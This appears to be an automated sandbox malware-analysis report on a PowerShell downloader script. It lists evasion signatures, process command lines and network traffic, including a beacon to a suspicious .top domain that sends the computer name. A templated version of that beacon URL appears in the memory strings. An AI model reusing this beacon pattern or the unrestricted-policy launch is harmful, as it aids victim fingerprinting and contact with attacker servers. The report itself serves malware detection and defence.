Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579870
MD5:6dc27c0ae6c260bbed7a9b00e3306263
SHA1:66d59a64b88b605d7fe887b4bcf7c9ea298fbb57
SHA256:fca7d47c39e4e5b1e375ff7497d67cfbd2bb4d2fa937c617f5a6b5c3c71ccb21
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6624, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6624, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.9% probability
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1828378406.000001E2F8CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbSq$$u source: powershell.exe, 00000000.00000002.1831734156.000001E2F907F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tomation.pdbue source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1832557825.000001E2F9338000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbM# source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbG source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1832557825.000001E2F9338000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1828378406.000001E2F8CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbh{ source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E2814B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.1792974672.000001E2814B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E2824B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28263C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28265D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28266A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28232D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1792974672.000001E280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1792974672.000001E280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1792974672.000001E281863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202
Source: powershell.exe, 00000000.00000002.1792974672.000001E282347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAE7AE10_2_00007FFD9BAE7AE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BAE88910_2_00007FFD9BAE8891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9BBA69890_2_00007FFD9BBA6989
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var 